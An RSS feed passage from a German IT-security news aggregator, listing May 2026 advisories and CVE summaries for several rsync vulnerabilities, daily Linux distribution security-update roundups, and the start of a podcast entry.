1: Credential Types curl Handles</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mehrere Probleme in rsync (SUSE)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3540829/it-security-nachrichten/mehrere-probleme-in-rsync-suse/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3540829/it-security-nachrichten/mehrere-probleme-in-rsync-suse/</guid>
<pubDate>Fri, 22 May 2026 23:38:43 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in rsync (SUSE)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3540799/unix-server/security-mehrere-probleme-in-rsync-suse/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3540799/unix-server/security-mehrere-probleme-in-rsync-suse/</guid>
<pubDate>Fri, 22 May 2026 23:31:13 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Ausführen beliebiger Kommandos in rsync (SUSE)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3540794/unix-server/security-ausfuehren-beliebiger-kommandos-in-rsync-suse/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3540794/unix-server/security-ausfuehren-beliebiger-kommandos-in-rsync-suse/</guid>
<pubDate>Fri, 22 May 2026 23:31:07 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in rsync (SUSE)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3540785/unix-server/security-mehrere-probleme-in-rsync-suse/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3540785/unix-server/security-mehrere-probleme-in-rsync-suse/</guid>
<pubDate>Fri, 22 May 2026 23:30:55 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (firefox), Debian (chromium, nss, openvpn, and thunderbird), Fedora (cockpit, kernel, and linux-firmware), Oracle (gdk-pixbuf2, kernel, and libsndfile), SUSE (container-suseconnect, cpp-httplib, dnsmasq, firefox, glibc, GraphicsMagick, java-1_8_0-ope...]]></description>
<link>https://tsecurity.de/de/3539657/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3539657/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 22 May 2026 15:10:46 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (firefox), <b>Debian</b> (chromium, nss, openvpn, and thunderbird), <b>Fedora</b> (cockpit, kernel, and linux-firmware), <b>Oracle</b> (gdk-pixbuf2, kernel, and libsndfile), <b>SUSE</b> (container-suseconnect, cpp-httplib, dnsmasq, firefox, glibc, GraphicsMagick, java-1_8_0-openj9, kernel, mozjs115, php8, python-urllib3, rekor, rootlesskit, rsync, tiff, ucode-intel, util-linux, and xz), and <b>Ubuntu</b> (bind9, bubblewrap, libarchive, linux-intel-iot-realtime, postgresql-14, postgresql-16, postgresql-17, postgresql-18, and xdg-desktop-portal).]]></content:encoded>
</item>
<item>
<title><![CDATA[trunk/2840c3a9adda1e8c6521fa1b7d55e6fc97cfce54]]></title>
<description><![CDATA[Use shutil instead of rsync in reuse_old_whl to fix OSDC builds (#184…]]></description>
<link>https://tsecurity.de/de/3538206/downloads/trunk2840c3a9adda1e8c6521fa1b7d55e6fc97cfce54/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3538206/downloads/trunk2840c3a9adda1e8c6521fa1b7d55e6fc97cfce54/</guid>
<pubDate>Fri, 22 May 2026 04:31:21 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Use shutil instead of rsync in reuse_old_whl to fix OSDC builds (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="186193628" data-permission-text="Title is private" data-url="https://github.com/pytorch/pytorch/issues/184" data-hovercard-type="issue" data-hovercard-url="/pytorch/pytorch/issues/184/hovercard" href="https://github.com/pytorch/pytorch/issues/184">#184</a>…</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Ausführen beliebiger Kommandos in rsync (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3536756/unix-server/security-ausfuehren-beliebiger-kommandos-in-rsync-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3536756/unix-server/security-ausfuehren-beliebiger-kommandos-in-rsync-fedora/</guid>
<pubDate>Thu, 21 May 2026 16:36:14 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in rsync (Slackware)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3536740/unix-server/security-mehrere-probleme-in-rsync-slackware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3536740/unix-server/security-mehrere-probleme-in-rsync-slackware/</guid>
<pubDate>Thu, 21 May 2026 16:35:33 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (kernel, kernel-rt, and libsndfile), Debian (bind9, evince, firefox-esr, openjpeg2, pdns, and rsync), Fedora (erlang-cowlib, evince, expat, firefox, kernel, mingw-expat, mysql8.0, mysql8.4, nss, opencryptoki, pgadmin4, proftpd, python-django5, python...]]></description>
<link>https://tsecurity.de/de/3536508/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3536508/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 21 May 2026 15:25:51 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (kernel, kernel-rt, and libsndfile), <b>Debian</b> (bind9, evince, firefox-esr, openjpeg2, pdns, and rsync), <b>Fedora</b> (erlang-cowlib, evince, expat, firefox, kernel, mingw-expat, mysql8.0, mysql8.4, nss, opencryptoki, pgadmin4, proftpd, python-django5, python-django6, python-dotenv, rsync, rust-nu, rustup, and strongswan), <b>Oracle</b> (nginx, nginx:1.24, ruby, ruby:3.3, and squid), <b>Slackware</b> (bind and rsync), <b>SUSE</b> (buildah, distribution, distribution-registry, docker, firefox-esr, helm, libpainter0, libsdb2_4_2, postgresql-jdbc, runc, and vim), and <b>Ubuntu</b> (gnutls28, gst-plugins-good1.0, jq, linux-nvidia, linux-nvidia-lowlatency, openvpn, rsync, and unbound).]]></content:encoded>
</item>
<item>
<title><![CDATA[Mehrere Probleme in rsync (Ubuntu)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3534497/it-security-nachrichten/mehrere-probleme-in-rsync-ubuntu/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3534497/it-security-nachrichten/mehrere-probleme-in-rsync-ubuntu/</guid>
<pubDate>Wed, 20 May 2026 23:24:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in rsync (Debian)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3534472/unix-server/security-mehrere-probleme-in-rsync-debian/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3534472/unix-server/security-mehrere-probleme-in-rsync-debian/</guid>
<pubDate>Wed, 20 May 2026 23:16:06 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-29518 | RsyncProject rsync up to 3.4.2 toctou (WID-SEC-2026-1611)]]></title>
<description><![CDATA[A vulnerability marked as problematic has been reported in RsyncProject rsync up to 3.4.2. The affected element is an unknown function. The manipulation leads to time-of-check time-of-use.

This vulnerability is referenced as CVE-2026-29518. The attack can only be performed from a local environme...]]></description>
<link>https://tsecurity.de/de/3534095/sicherheitsluecken/cve-2026-29518-rsyncproject-rsync-up-to-342-toctou-wid-sec-2026-1611/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3534095/sicherheitsluecken/cve-2026-29518-rsyncproject-rsync-up-to-342-toctou-wid-sec-2026-1611/</guid>
<pubDate>Wed, 20 May 2026 20:09:56 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">problematic</a> has been reported in <a href="https://vuldb.com/product/rsyncproject:rsync">RsyncProject rsync up to 3.4.2</a>. The affected element is an unknown function. The manipulation leads to time-of-check time-of-use.

This vulnerability is referenced as <a href="https://vuldb.com/cve/CVE-2026-29518">CVE-2026-29518</a>. The attack can only be performed from a local environment. No exploit is available.

It is suggested to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-43617 | RsyncProject rsync up to 3.4.2 Access Control List authentication by alternate name (GHSA-rjfm-3w2m-jf4f / WID-SEC-2026-1611)]]></title>
<description><![CDATA[A vulnerability was found in RsyncProject rsync up to 3.4.2. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the component Access Control List Handler. Executing a manipulation can lead to authentication bypass by alternate name.

The identificat...]]></description>
<link>https://tsecurity.de/de/3534094/sicherheitsluecken/cve-2026-43617-rsyncproject-rsync-up-to-342-access-control-list-authentication-by-alternate-name-ghsa-rjfm-3w2m-jf4f-wid-sec-2026-1611/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3534094/sicherheitsluecken/cve-2026-43617-rsyncproject-rsync-up-to-342-access-control-list-authentication-by-alternate-name-ghsa-rjfm-3w2m-jf4f-wid-sec-2026-1611/</guid>
<pubDate>Wed, 20 May 2026 20:09:54 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/rsyncproject:rsync">RsyncProject rsync up to 3.4.2</a>. It has been declared as <a href="https://vuldb.com/kb/risk">problematic</a>. Affected by this vulnerability is an unknown functionality of the component <em>Access Control List Handler</em>. Executing a manipulation can lead to authentication bypass by alternate name.

The identification of this vulnerability is <a href="https://vuldb.com/cve/CVE-2026-43617">CVE-2026-43617</a>. The attack may be launched remotely. There is no exploit available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-43618 | RsyncProject rsync up to 3.4.2 integer overflow (GHSA-g37v-g3gj-pmwq / WID-SEC-2026-1611)]]></title>
<description><![CDATA[A vulnerability categorized as critical has been discovered in RsyncProject rsync up to 3.4.2. This affects an unknown part. The manipulation results in integer overflow.

This vulnerability is identified as CVE-2026-43618. The attack can be executed remotely. There is not any exploit available.
...]]></description>
<link>https://tsecurity.de/de/3534093/sicherheitsluecken/cve-2026-43618-rsyncproject-rsync-up-to-342-integer-overflow-ghsa-g37v-g3gj-pmwq-wid-sec-2026-1611/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3534093/sicherheitsluecken/cve-2026-43618-rsyncproject-rsync-up-to-342-integer-overflow-ghsa-g37v-g3gj-pmwq-wid-sec-2026-1611/</guid>
<pubDate>Wed, 20 May 2026 20:09:53 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">critical</a> has been discovered in <a href="https://vuldb.com/product/rsyncproject:rsync">RsyncProject rsync up to 3.4.2</a>. This affects an unknown part. The manipulation results in integer overflow.

This vulnerability is identified as <a href="https://vuldb.com/cve/CVE-2026-43618">CVE-2026-43618</a>. The attack can be executed remotely. There is not any exploit available.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-43619 | RsyncProject rsync up to 3.4.2 Exported Rsync toctou (GHSA-4h9m-w5ff-j735 / WID-SEC-2026-1611)]]></title>
<description><![CDATA[A vulnerability was found in RsyncProject rsync up to 3.4.2. It has been classified as problematic. This affects an unknown part of the component Exported Rsync Module. The manipulation leads to time-of-check time-of-use.

This vulnerability is uniquely identified as CVE-2026-43619. Local access ...]]></description>
<link>https://tsecurity.de/de/3534092/sicherheitsluecken/cve-2026-43619-rsyncproject-rsync-up-to-342-exported-rsync-toctou-ghsa-4h9m-w5ff-j735-wid-sec-2026-1611/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3534092/sicherheitsluecken/cve-2026-43619-rsyncproject-rsync-up-to-342-exported-rsync-toctou-ghsa-4h9m-w5ff-j735-wid-sec-2026-1611/</guid>
<pubDate>Wed, 20 May 2026 20:09:52 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/rsyncproject:rsync">RsyncProject rsync up to 3.4.2</a>. It has been classified as <a href="https://vuldb.com/kb/risk">problematic</a>. This affects an unknown part of the component <em>Exported Rsync Module</em>. The manipulation leads to time-of-check time-of-use.

This vulnerability is uniquely identified as <a href="https://vuldb.com/cve/CVE-2026-43619">CVE-2026-43619</a>. Local access is required to approach this attack. No exploit exists.

Upgrading the affected component is recommended.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-43620 | RsyncProject rsync up to 3.4.2 receiver.c recv_files out-of-bounds (GHSA-28pw-r563-rxvm / WID-SEC-2026-1611)]]></title>
<description><![CDATA[A vulnerability has been found in RsyncProject rsync up to 3.4.2 and classified as problematic. Affected by this vulnerability is the function recv_files of the file receiver.c. Performing a manipulation results in out-of-bounds read.

This vulnerability is known as CVE-2026-43620. Remote exploit...]]></description>
<link>https://tsecurity.de/de/3534091/sicherheitsluecken/cve-2026-43620-rsyncproject-rsync-up-to-342-receiverc-recvfiles-out-of-bounds-ghsa-28pw-r563-rxvm-wid-sec-2026-1611/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3534091/sicherheitsluecken/cve-2026-43620-rsyncproject-rsync-up-to-342-receiverc-recvfiles-out-of-bounds-ghsa-28pw-r563-rxvm-wid-sec-2026-1611/</guid>
<pubDate>Wed, 20 May 2026 20:09:51 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/rsyncproject:rsync">RsyncProject rsync up to 3.4.2</a> and classified as <a href="https://vuldb.com/kb/risk">problematic</a>. Affected by this vulnerability is the function <code>recv_files</code> of the file <em>receiver.c</em>. Performing a manipulation results in out-of-bounds read.

This vulnerability is known as <a href="https://vuldb.com/cve/CVE-2026-43620">CVE-2026-43620</a>. Remote exploitation of the attack is possible. No exploit is available.

The affected component should be upgraded.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-45232 | RsyncProject rsync up to 3.4.2 Environment Variable socket.c establish_proxy_connection RSYNC_PROXY off-by-one (GHSA-8f85-j2cv-59m8 / WID-SEC-2026-1611)]]></title>
<description><![CDATA[A vulnerability was found in RsyncProject rsync up to 3.4.2 and classified as problematic. Affected by this issue is the function establish_proxy_connection of the file socket.c of the component Environment Variable Handler. Executing a manipulation of the argument RSYNC_PROXY can lead to off-by-...]]></description>
<link>https://tsecurity.de/de/3534090/sicherheitsluecken/cve-2026-45232-rsyncproject-rsync-up-to-342-environment-variable-socketc-establishproxyconnection-rsyncproxy-off-by-one-ghsa-8f85-j2cv-59m8-wid-sec-2026-1611/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3534090/sicherheitsluecken/cve-2026-45232-rsyncproject-rsync-up-to-342-environment-variable-socketc-establishproxyconnection-rsyncproxy-off-by-one-ghsa-8f85-j2cv-59m8-wid-sec-2026-1611/</guid>
<pubDate>Wed, 20 May 2026 20:09:49 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/rsyncproject:rsync">RsyncProject rsync up to 3.4.2</a> and classified as <a href="https://vuldb.com/kb/risk">problematic</a>. Affected by this issue is the function <code>establish_proxy_connection</code> of the file <em>socket.c</em> of the component <em>Environment Variable Handler</em>. Executing a manipulation of the argument <em>RSYNC_PROXY</em> can lead to off-by-one.

This vulnerability is handled as <a href="https://vuldb.com/cve/CVE-2026-45232">CVE-2026-45232</a>. The attack can be executed remotely. There is not any exploit available.

It is suggested to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[DSA-6282-1 rsync - security update]]></title>
<description><![CDATA[Several vulnerabilities were discovered in rsync, a fast, versatile,
remote (and local) file-copying tool, which may result in local
privilege escalation, bypass of intended access restrictions, remote
memory disclosure to an authenticated daemon peer or denial of service.


https://security-trac...]]></description>
<link>https://tsecurity.de/de/3533876/unix-server/dsa-6282-1-rsync-security-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3533876/unix-server/dsa-6282-1-rsync-security-update/</guid>
<pubDate>Wed, 20 May 2026 18:45:54 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Several vulnerabilities were discovered in rsync, a fast, versatile,
remote (and local) file-copying tool, which may result in local
privilege escalation, bypass of intended access restrictions, remote
memory disclosure to an authenticated daemon peer or denial of service.

<p>
<a href="https://security-tracker.debian.org/tracker/DSA-6282-1">https://security-tracker.debian.org/tracker/DSA-6282-1</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8283-1: rsync vulnerabilities]]></title>
<description><![CDATA[Calum Hutton discovered that rsync contained a heap-based out-of-bounds
read when handling file transfers. A remote attacker with read access
to an rsync server could possibly use this issue to cause a denial of
service. This issue only affected Ubuntu 22.04 LTS, Ubuntu 24.04 LTS,
and Ubuntu 25.1...]]></description>
<link>https://tsecurity.de/de/3533269/unix-server/usn-8283-1-rsync-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3533269/unix-server/usn-8283-1-rsync-vulnerabilities/</guid>
<pubDate>Wed, 20 May 2026 16:01:10 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Calum Hutton discovered that rsync contained a heap-based out-of-bounds
read when handling file transfers. A remote attacker with read access
to an rsync server could possibly use this issue to cause a denial of
service. This issue only affected Ubuntu 22.04 LTS, Ubuntu 24.04 LTS,
and Ubuntu 25.10. (CVE-2025-10158)

Batuhan Sancak, Damien Neil, and Michael Stapelberg discovered that
rsync daemons configured without chroot protection were exposed to a
race condition on parent path components. A local attacker with write
access to a module could possibly use this issue to overwrite files,
obtain sensitive information, or escalate privileges.
(CVE-2026-29518)

It was discovered that rsync did not properly validate a length value
while sorting extended attributes. An attacker could possibly use this
issue to cause a denial of service. (CVE-2026-41035)

It was discovered that rsync performed reverse-DNS lookups after
chrooting in some daemon configurations. A remote attacker could
possibly use this issue to bypass hostname-based access controls and
access network services. (CVE-2026-43617)

Omar Elsayed discovered that rsync did not properly check for integer
overflows while decoding compressed tokens. A remote attacker could
possibly use this issue to obtain sensitive information.
(CVE-2026-43618)

Andrew Tridgell discovered that rsync did not fully fix a symlink race
condition in path-based system calls for daemons configured without
chroot protection. A local attacker could possibly use this issue to
overwrite files, obtain sensitive information, or escalate privileges.
(CVE-2026-43619)

Pratham Gupta discovered that rsync did not properly validate an index
while processing file lists. A remote attacker could possibly use this
issue to cause rsync to crash, resulting in a denial of service.
(CVE-2026-43620)

Michal Ruprich discovered that rsync contained an off-by-one error
while handling HTTP proxy responses. An attacker able to intercept network
communications or a malicious proxy server could possibly use this issue to
cause a denial of service. (CVE-2026-45232)]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Wednesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (kernel, libpng, nginx, nginx:1.24, ruby, and ruby:3.3), Debian (gnutls28 and linux-6.1), Fedora (dnsmasq, kernel, keylime-agent-rust, perl-Net-CIDR-Lite, python-pysam, python-urllib3, rust-cargo-vendor-filterer, rust-ingredients, rust-oo7-cli, rust-...]]></description>
<link>https://tsecurity.de/de/3533100/linux-tipps/security-updates-for-wednesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3533100/linux-tipps/security-updates-for-wednesday/</guid>
<pubDate>Wed, 20 May 2026 15:11:25 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (kernel, libpng, nginx, nginx:1.24, ruby, and ruby:3.3), <b>Debian</b> (gnutls28 and linux-6.1), <b>Fedora</b> (dnsmasq, kernel, keylime-agent-rust, perl-Net-CIDR-Lite, python-pysam, python-urllib3, rust-cargo-vendor-filterer, rust-ingredients, rust-oo7-cli, rust-rpki, rust-sevctl, and rust-tealdeer), <b>Mageia</b> (bind), <b>Oracle</b> (bind, giflib, gimp:2.8, kernel, libpng, rsync, ruby, and vim), <b>Slackware</b> (haveged and mozilla), <b>SUSE</b> (cockpit, dnsmasq, erlang26, freeipmi, git-bug, glibc, GraphicsMagick, haveged, ImageMagick, iproute2, kernel, openssh, perl-CryptX, perl-HTTP-Tiny, postgresql14, postgresql15, postgresql16, python-Pillow, rsync, tiff, and traefik), and <b>Ubuntu</b> (Highlight.js, linux, linux-aws, linux-aws-5.15, linux-aws-fips, linux-fips, linux-gcp,
 linux-gcp-fips, linux-gke, linux-gkeop, linux-hwe-5.15, linux-ibm,
 linux-ibm-5.15, linux-intel-iotg, linux-intel-iotg-5.15, linux-kvm,
 linux-nvidia, linux-nvidia-tegra, linux-nvidia-tegra-5.15, linux-oracle,
 linux-raspi, linux-realtime, linux, linux-aws, linux-aws-fips, linux-bluefield, linux-fips, linux-gcp,
 linux-gcp-5.4, linux-gcp-fips, linux-ibm, linux-ibm-5.4, linux-kvm,
 linux-oracle, linux-oracle-5.4, linux-xilinx-zynqmp, linux, linux-aws, linux-aws-fips, linux-fips, linux-gcp-4.15,
 linux-gcp-fips, linux-kvm, linux-oracle, linux, linux-aws, linux-aws-fips, linux-gcp, linux-gcp-fips, linux-gke,
 linux-gkeop, linux-ibm, linux-ibm-6.8, linux-lowlatency,
 linux-lowlatency-hwe-6.8, linux-raspi, linux-raspi-realtime,
 linux-realtime, linux-realtime-6.8, linux, linux-aws, linux-hwe-6.17, linux-oem-6.17, linux-oracle,
 linux-raspi, linux-realtime, linux-realtime-6.17, and smarty3).]]></content:encoded>
</item>
<item>
<title><![CDATA[[NEU] [hoch] Rsync: Mehrere Schwachstellen]]></title>
<description><![CDATA[Ein Angreifer kann mehrere Schwachstellen in Rsync ausnutzen, um seine Privilegien zu erhöhen, um Informationen offenzulegen, um Sicherheitsvorkehrungen zu umgehen, und um einen Denial of Service Angriff durchzuführen.]]></description>
<link>https://tsecurity.de/de/3532833/it-security-nachrichten/neu-hoch-rsync-mehrere-schwachstellen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3532833/it-security-nachrichten/neu-hoch-rsync-mehrere-schwachstellen/</guid>
<pubDate>Wed, 20 May 2026 13:50:14 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein Angreifer kann mehrere Schwachstellen in Rsync ausnutzen, um seine Privilegien zu erhöhen, um Informationen offenzulegen, um Sicherheitsvorkehrungen zu umgehen, und um einen Denial of Service Angriff durchzuführen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Ausführen beliebiger Kommandos in rsync (SUSE)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3531493/unix-server/security-ausfuehren-beliebiger-kommandos-in-rsync-suse/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3531493/unix-server/security-ausfuehren-beliebiger-kommandos-in-rsync-suse/</guid>
<pubDate>Wed, 20 May 2026 06:30:51 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Ausführen beliebiger Kommandos in rsync (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3530878/it-security-nachrichten/ausfuehren-beliebiger-kommandos-in-rsync-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3530878/it-security-nachrichten/ausfuehren-beliebiger-kommandos-in-rsync-red-hat/</guid>
<pubDate>Tue, 19 May 2026 23:23:43 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Ausführen beliebiger Kommandos in rsync (SUSE)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3530761/it-security-nachrichten/ausfuehren-beliebiger-kommandos-in-rsync-suse/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3530761/it-security-nachrichten/ausfuehren-beliebiger-kommandos-in-rsync-suse/</guid>
<pubDate>Tue, 19 May 2026 22:37:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Security updates for Tuesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (libpng and nginx), Debian (erlang, netatalk, and nginx), Fedora (mod_md and SDL2_image), Mageia (perl-libwww-perl, perl-HTTP-Message, perl-WWW-Mechanize-Cached, perl-File-XDG, perl-Path-Tiny, perl-YAML-Syck, postgresql15, and rclone), SUSE (agama, a...]]></description>
<link>https://tsecurity.de/de/3529281/linux-tipps/security-updates-for-tuesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3529281/linux-tipps/security-updates-for-tuesday/</guid>
<pubDate>Tue, 19 May 2026 15:27:56 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (libpng and nginx), <b>Debian</b> (erlang, netatalk, and nginx), <b>Fedora</b> (mod_md and SDL2_image), <b>Mageia</b> (perl-libwww-perl, perl-HTTP-Message, perl-WWW-Mechanize-Cached, perl-File-XDG, perl-Path-Tiny, perl-YAML-Syck, postgresql15, and rclone), <b>SUSE</b> (agama, alloy, cacti, cloud-init, dnsmasq, emacs, firefox, glibc, go1.25, go1.26, google-cloud-sap-agent, google-guest-agent, ibus-rime, librime, imagemagick, kernel, libsndfile, nginx, ongres-scram, ongres-stringprep, plexus-testing,, openexr, openssh, PackageKit, perl-Text-CSV_XS, php-composer2, php8, postgresql16, postgresql18, python-lxml, python-python-multipart, python3, python311-urllib3, rmt-server, rsync, tiff, tree-sitter, util-linux, and xen), and <b>Ubuntu</b> (linux, linux-aws, linux-aws-5.4, linux-aws-fips, linux-azure, linux-azure-5.4, linux-azure-fips, linux-bluefield, linux-fips, linux-gcp, linux-gcp-5.4, linux-gcp-fips, linux-hwe-5.4, linux-ibm, linux-ibm-5.4, linux-iot, linux-kvm, linux-oracle, linux-oracle-5.4, linux-xilinx-zynqmp, linux, linux-aws, linux-kvm, linux-lts-xenial, linux-nvidia-tegra, linux-nvidia-tegra-5.15, linux-raspi, and linux-xilinx-zynqmp).]]></content:encoded>
</item>
<item>
<title><![CDATA[HPR4642: Hackerpublic Radio New Years Eve Show 2026 Episode 7]]></title>
<description><![CDATA[This show has been flagged as Explicit by the host.



PFSense









https://www.pfsense.org/









Chromebook









https://www.google.com/chromebook/discover-chromebook/









AMD Sempron 140









https://www.techpowerup.com/cpu-specs/sempron-140.c820
...]]></description>
<link>https://tsecurity.de/de/3527509/podcasts/hpr4642-hackerpublic-radio-new-years-eve-show-2026-episode-7/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3527509/podcasts/hpr4642-hackerpublic-radio-new-years-eve-show-2026-episode-7/</guid>
<pubDate>Tue, 19 May 2026 02:02:56 +0200</pubDate>
<category>🎥 Podcasts</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This show has been flagged as Explicit by the host.</p>

<p>

PFSense
</p>

<p>

</p>

<p>

<a href="https://www.pfsense.org/" rel="noopener noreferrer" target="_blank">
https://www.pfsense.org/</a>

</p>

<p>

</p>

<p>

Chromebook
</p>

<p>

</p>

<p>

<a href="https://www.google.com/chromebook/discover-chromebook/" rel="noopener noreferrer" target="_blank">
https://www.google.com/chromebook/discover-chromebook/</a>

</p>

<p>

</p>

<p>

AMD Sempron 140
</p>

<p>

</p>

<p>

<a href="https://www.techpowerup.com/cpu-specs/sempron-140.c820" rel="noopener noreferrer" target="_blank">
https://www.techpowerup.com/cpu-specs/sempron-140.c820</a>

</p>

<p>

</p>

<p>

Trinity
</p>

<p>

</p>

<p>

<a href="https://www.trinitydesktop.org/" rel="noopener noreferrer" target="_blank">
